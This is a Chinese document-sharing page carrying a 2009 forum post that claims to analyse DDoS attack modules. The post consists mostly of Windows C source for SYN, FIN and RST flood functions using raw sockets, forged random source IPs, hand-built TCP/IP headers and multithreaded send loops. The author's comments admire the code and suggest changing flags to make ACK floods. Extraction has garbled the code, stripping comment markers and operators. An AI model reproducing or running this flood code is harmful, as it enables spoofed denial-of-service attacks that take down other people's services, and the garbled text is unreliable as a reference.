DDOS代码.doc_第1页
DDOS代码.doc_第2页
DDOS代码.doc_第3页
DDOS代码.doc_第4页
DDOS代码.doc_第5页
已阅读5页,还剩13页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

【原创】对现有的所能找到的DDOS代码(攻击模块)做出一次分析-SYN篇作 者: alalmn时 间: 2009-10-04,02:03链 接: /showthread.php?t=98896/=对现有的所能找到的DDOS代码(攻击模块)做出一次分析-SYN篇分析者:alalmn飞龙 BLOG:/alalmn分析的不好请各位高手见谅花了几个小时分析的呵呵SYN洪水攻击syn flood(SYN洪水攻击)介绍 /alalmn/blog/item/56d5d81f234fae00304e15e8.htmlTcpHeader.th_flag = 2; /0,2,4,8,16,32-FIN,SYN,RST,PSH,ACK,URG /SYN 标志我们可以不可以改变这个值 2是SYN攻击 改成16变成ACK攻击这样可以吗我刚才还在想这个问题 暴风DDOSVIP2010-225源代码.h 源码里就已经写到了呵呵爽啊暴风DDOSVIP2010-225源代码.h SYN(流量) 我觉得写得非常好真的个人看法QQ:316118740/=冷风的.htypedef struct tcphdr /定义TCP首部USHORT th_sport; /16位源端口USHORT th_dport; /16位目的端口unsigned int th_seq; /32位序列号unsigned int th_ack; /32位确认号unsigned char th_lenres; /4位首部长度+6位保留字中的4位unsigned char th_flag; /2位保留字+6位标志位USHORT th_win; /16位窗口大小USHORT th_sum; /16位校验和USHORT th_urp; /16位紧急数据偏移量TCP_HEADER;typedef struct _iphdr /ip头 unsigned char h_verlen; /4位首部长度+4位IP版本号 unsigned char tos; /8位服务类型TOS unsigned short total_len; /16位总长度(字节) unsigned short ident; /16位标识 unsigned short frag_and_flags; /3位标志位 unsigned char ttl; /8位生存时间TTL unsigned char proto; /8位协议号(TCP, UDP 或其他) unsigned short checksum; /16位IP首部校验和 unsigned int sourceIP; /32位源IP地址 unsigned int destIP; /32位目的IP地址 IP_HEADER;typedef struct tsd_hdr /定义TCP伪首部 unsigned long saddr; /源地址 unsigned long daddr; /目的地址 char mbz; char ptcl; /协议类型unsigned short tcpl; /TCP长度 PSD_HEADER;/计算校验和USHORT checksum(USHORT *buffer,int size)unsigned long cksum=0;while (size1)cksum+=*buffer+;size-=sizeof(USHORT);if (size)cksum+=*(UCHAR*)buffer;cksum = (cksum 16) + (cksum & 0xffff); cksum += (cksum 16); return (USHORT)(cksum);/*SYN FLOOD*/unsigned long CALLBACK SynFloodFunction(LPVOID dParam) /SYN攻击SOCKET sendSocket; /套接字SOCKADDR_IN Sin; /IP信息结构IP_HEADER ipHeader;TCP_HEADER tcpHeader; PSD_HEADER psdHeader; char szSendBuf1024 = ;if(sendSocket = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED) = INVALID_SOCKET) /创建一个与指定传送服务提供者捆绑的套接口 /INVALID_SOCKET发生错误printf(Socket Setup Error.n); /插口设定错误 return 0; BOOL flag=1; if(setsockopt(sendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag) = SOCKET_ERROR) /设置套接口的选项 设置发送和接收的超时 /SOCKET_ERROR创建错误 printf(Setsockopt IP_HDRINCL Error.n); /Setsockopt IP_HDRINCL错误 return 0; int timeout = 3000; if(setsockopt(sendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout) = SOCKET_ERROR) /设置套接口的选项 设置发送和接收的超时 /SOCKET_ERROR创建错误 printf(Setsockopt SO_SNDTIMEO Error.n); /Setsockopt SO_SNDTIMEO错误 return 0; Sin.sin_family = AF_INET; /sin_family 地址家族(必须是AF_INET)Sin.sin_port=htons(DdosPort); /目标端口号(使用网络字节顺序)Sin.sin_addr.S_un.S_addr=resolve(DdosUrl); /目标IP地址char src_ip20 = 0;while(!StopDDosAttack) /是否在攻击状态wsprintf( src_ip, %d.%d.%d.%d, rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1 ); /格式化字符串 伪造IP/填充IP首部 ipHeader.h_verlen = (44 | sizeof(ipHeader)/sizeof(unsigned long); /高四位IP版本号,低四位首部长度 ipHeader.tos = 0; ipHeader.total_len = htons(sizeof(ipHeader)+sizeof(tcpHeader); /16位总长度(字节) ipHeader.ident = 1; /16位标识 ipHeader.frag_and_flags = 0x40; /3位标志位 ipHeader.ttl = 128; /8位生存时间TTL ipHto = IPPROTO_TCP; /8位协议(TCP,UDP) ipHeader.checksum = 0; /16位IP首部校验和ipHeader.sourceIP = inet_addr(src_ip); /伪IP 伪装自己的IPipHeader.destIP = Sin.sin_addr.s_addr; /目标地址/填充TCP首部 tcpHeader.th_sport = htons( 12121 ); /源端口号 tcpHeader.th_dport = htons( DdosPort ); /目标端口tcpHeader.th_seq = htonl( rand()%900000000 + 1 ); /SYN序列号tcpHeader.th_ack = 0; /ACK序列号置为0 tcpHeader.th_lenres = (sizeof(tcpHeader)/4FIN,SYN,RST,PSH,ACK,URGtcpHeader.th_win = htons(512); /窗口大小tcpHeader.th_sum = 0; /校验tcpHeader.th_urp = 0; /紧急数据偏移量/填充TCP伪首部(用于计算校验和,并不真正发送) psdHeader.saddr = ipHeader.sourceIP; /伪IP 伪装自己的IPpsdHeader.daddr = ipHeader.destIP; /目标地址psdHeader.mbz = 0; psdHeader.ptcl = IPPROTO_TCP; /协议类型psdHeader.tcpl = htons(sizeof(tcpHeader); /TCP长度/计算TCP校验和 /计算TCP校验和,计算校验和时需要包括TCP pseudo header memcpy( szSendBuf, &psdHeader, sizeof(psdHeader) ); memcpy( szSendBuf + sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader) ); tcpHeader.th_sum = checksum( (USHORT *) szSendBuf, sizeof(psdHeader) + sizeof(tcpHeader) );/计算IP检验和 memcpy( szSendBuf, &ipHeader, sizeof(ipHeader) ); memcpy( szSendBuf + sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader) ); memset( szSendBuf + sizeof(ipHeader) + sizeof(tcpHeader), 0, 4 ); /内存空间初始化ipHeader.checksum = checksum( (USHORT *) szSendBuf, sizeof(ipHeader) + sizeof(tcpHeader) );memcpy( szSendBuf, &ipHeader, sizeof(ipHeader) ); /填充发送缓冲区memcpy( szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader) ); /填充发送缓冲区for(int a=0;a1)cksum+=*buffer+;size -=sizeof(USHORT);if(size)cksum += *(UCHAR*)buffer;cksum = (cksum 16) + (cksum & 0xffff);cksum += (cksum 16);return (USHORT)(cksum);/*-*/void finattack() /Fin(流量)srand(unsigned) time(NULL); WSADATA wsaData;WSAStartup(MAKEWORD(2, 2), &wsaData);SOCKET SendSocket; IP_HEADER ip_header; TCP_HEADER tcp_header; PSD_HEADER psd_header;char rawip20=44;char SendBuff100;SendSocket = WSASocket( AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED ); if( SendSocket = INVALID_SOCKET ) return;BOOL Flag = TRUE; if( setsockopt(SendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&Flag, sizeof(Flag) = SOCKET_ERROR ) return;int Timeout = 5000; if ( setsockopt(SendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *) &Timeout, sizeof(Timeout) = SOCKET_ERROR ) return;SOCKADDR_IN Sin;Sin.sin_family = AF_INET; Sin.sin_port = tgtPort; Sin.sin_addr.s_addr = inet_addr(tgtIP);ip_header.h_verlen = (44 | sizeof(ip_header)/sizeof(unsigned long); ip_header.tos = 0; ip_header.total_len = htons(sizeof(ip_header)+sizeof(tcp_header); ip_header.ident = 1; ip_header.frag_and_flags = 0x40; ip_header.ttl = rand()%256; ip_to = IPPROTO_TCP; ip_header.checksum = 0; ip_header.sourceIP = inet_addr(rawip); ip_header.destIP = inet_addr(tgtIP);tcp_header.th_sport = htons( rand()%60000 + 1 );tcp_header.th_dport = htons( tgtPort ); tcp_header.th_seq = htonl( rand()%900000000 + 1 ); tcp_header.th_ack = 0; tcp_header.th_lenres = (sizeof(tcp_header)/4FIN,SYN,RST,PSH,ACK,URG 这个地方不一样tcp_header.th_win = htons(512); tcp_header.th_sum = 0; tcp_header.th_urp = 0;psd_header.saddr = ip_header.sourceIP; psd_header.daddr = ip_header.destIP; psd_header.mbz = 0; psd_header.ptcl = IPPROTO_TCP; psd_header.tcpl = htons(sizeof(tcp_header);memcpy(SendBuff,&psd_header,sizeof(psd_header); memcpy(SendBuff+sizeof(psd_header),&tcp_header,sizeof(tcp_header); tcp_header.th_sum=checksum(USHORT*)SendBuff,sizeof(psd_header)+sizeof(tcp_header); memcpy(SendBuff,&ip_header,sizeof(ip_header); memcpy(SendBuff+sizeof(ip_header),&tcp_header, sizeof(tcp_header); memset(SendBuff+sizeof(ip_header)+sizeof(tcp_header),0,4); ip_header.checksum=checksum(USHORT*)SendBuff,sizeof(ip_header)+sizeof(tcp_header);memcpy(SendBuff,&ip_header,sizeof(ip_header); memcpy(SendBuff+sizeof(ip_header),&tcp_header,sizeof(tcp_header);while (1)if (StopFlag = 1)ExitThread(0);return;for(int a=0;ah_addr, hp-h_length);strcpy(tgtIP,inet_ntoa(in);elsestrcpy(tgtIP,ip);port=tgtPort;time=timeout;if (StopFlag = -1)return;StopFlag=-1;for(z=0;zxc;z+)hz=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)finattack, NULL, 0, NULL);if(timeout!=0)CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);/*-*/void rstattack() /伪造RST协议(流量)srand(unsigned) time(NULL); WSADATA wsaData;WSAStartup(MAKEWORD(2, 2), &wsaData);SOCKET SendSocket; IP_HEADER ip_header; TCP_HEADER tcp_header; PSD_HEADER psd_header;char rawip20=44;char SendBuff100;SendSocket = WSASocket( AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED ); if( SendSocket = INVALID_SOCKET ) return;BOOL Flag = TRUE; if( setsockopt(SendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&Flag, sizeof(Flag) = SOCKET_ERROR ) return;int Timeout = 5000; if ( setsockopt(SendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *) &Timeout, sizeof(Timeout) = SOCKET_ERROR ) return;SOCKADDR_IN Sin;Sin.sin_family = AF_INET; Sin.sin_port = tgtPort; Sin.sin_addr.s_addr = inet_addr(tgtIP);ip_header.h_verlen = (44 | sizeof(ip_header)/sizeof(unsigned long); ip_header.tos = 0; ip_header.total_len = htons(sizeof(ip_header)+sizeof(tcp_header); ip_header.ident = 1; ip_header.frag_and_flags = 0x40; ip_header.ttl = rand()%256; ip_to = IPPROTO_TCP; ip_header.checksum = 0; ip_header.sourceIP = inet_addr(rawip); ip_header.destIP = inet_addr(tgtIP);tcp_header.th_sport = htons( rand()%60000 + 1 );tcp_header.th_dport = htons( tgtPort ); tcp_header.th_seq = htonl( rand()%900000000 + 1 ); tcp_header.th_ack = 0; tcp_header.th_lenres = (sizeof(tcp_header)/4FIN,SYN,RST,PSH,ACK,URG 这个地方不一样tcp_header.th_win = htons(512); tcp_header.th_sum = 0; tcp_header.th_urp = 0;psd_header.saddr = ip_header.sourceIP; psd_header.daddr = ip_header.destIP; psd_header.mbz = 0; psd_header.ptcl = IPPROTO_TCP; psd_header.tcpl = htons(sizeof(tcp_header);memcpy(SendBuff,&psd_header,sizeof(psd_header); memcpy(SendBuff+sizeof(psd_header),&tcp_header,sizeof(tcp_header); tcp_header.th_sum=checksum(USHORT*)SendBuff,sizeof(psd_header)+sizeof(tcp_header); memcpy(SendBuff,&ip_header,sizeof(ip_header); memcpy(SendBuff+sizeof(ip_header),&tcp_header, sizeof(tcp_header); memset(SendBuff+sizeof(ip_header)+sizeof(tcp_header),0,4); ip_header.checksum=checksum(USHORT*)SendBuff,sizeof(ip_header)+sizeof(tcp_header);memcpy(SendBuff,&ip_header,sizeof(ip_header); memcpy(SendBuff+sizeof(ip_header),&tcp_header,sizeof(tcp_header);while (1)if (StopFlag = 1)ExitThread(0);return;for(int a=0;ah_addr, hp-h_length);strcpy(tgtIP,inet_ntoa(in);elsestrcpy(tgtIP,ip);port=tgtPort;time=timeout;if (StopFlag = -1)return;StopFlag=-1;for(z=0;zxc;z+)hz=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)rstattack, NULL, 0, NULL);if(timeout!=0)CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);/*-*/void synattack() /SYN(流量)srand(unsigned) time(NULL); WSADATA wsaData; /这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据WSAStartup(MAKEWORD(2, 2), &wsaData); /确定SOCKET版本SOCKET SendSocket; IP_HEADER ip_header; TCP_HEADER tcp_header; PSD_HEADER psd_header;char rawip20=44; /默认伪IPchar SendBuff100;SendSocket = WSASocket( AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED ); /创建一个与指定传送服务提供者捆绑的套接口if( SendSocket = INVALID_SOCKET ) /INVALID_SOCKET发生错误return;BOOL Flag = TRUE; if( setsockopt(SendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&Flag, sizeof(Flag) = SOCKET_ERROR ) /设置套接口的选项 设置发送和接收的超时 /SOCKET_ERROR创建错误return;int Timeout = 5000; if ( setsockopt(SendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *) &Timeout, sizeof(Timeout) = SOCKET_ERROR ) /设置套接口的选项 设置发送和接收的超时 /SOCKET_ERROR创建错误return;SOCKADDR_IN Sin; /IP信息结构Sin.sin_family = AF_INET; /sin_family 地址家族(必须是AF_INET)Sin.sin_port = tgtPort; /目标端口号(使用网络字节顺序)Sin.sin_addr.s_addr = inet_addr(tgtIP); /目标IP地址ip_header.h_verlen = (44 | sizeof(ip_header)/sizeof(unsigned long); /高四位IP版本号,低四位首部长度 ip_header.tos = 0; ip_header.total_len = htons(sizeof(ip_header)+sizeof(tcp_header); /16位总长度(字节) ip_header.ident = 1; /16位标识 ip_header.frag_and_flags = 0x40; /3位标志位ip_header.ttl = rand()%256; /8位生存时间TTL ip_to = IPPROTO_TCP; /8位协议(TCP,UDP) ip_header.checksum = 0; /16位IP首部校验和ip_header.sourceIP = inet_addr(rawip); /伪IP 伪装自己的IPip_header.destIP = inet_addr(tgtIP); /目标地址/填充TCP首部 tcp_header.th_sport = htons( rand()%60000 + 1 ); /源端口号 目标端口 随机产生呵呵很好很高很绝tcp_header.th_dport = htons( tgtPort ); /目标端口tcp_header.th_seq = htonl( rand()%900000000 + 1 ); /SYN序列号tcp_header.th_ack = 0; /ACK序列号置为0tcp_header.th_lenres = (sizeof(tcp_header)/4FIN,SYN,RST,PSH,ACK,URGtcp_header.th_win = htons(512); /窗口大小tcp_header.th_sum = 0; /校验tcp_header.th_urp = 0; /紧急数据偏移量/填充TCP伪首部(用于计算校验和,并不真正发送) psd_header.saddr = ip_header.sourceIP; /伪IP 伪装自己的IPpsd_header.daddr = ip_header.destIP; /目标地址psd_header.mbz = 0; psd_header.ptcl = IPPROTO_TCP; /协议类型psd_header.tcpl = htons(sizeof(tcp_header); /TCP长度while (1)if (StopFlag = 1) /判断攻击状态ExitThread(0);return;for(int a=0;ah_addr, hp-h_length);strcpy(tgtIP,inet_n

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论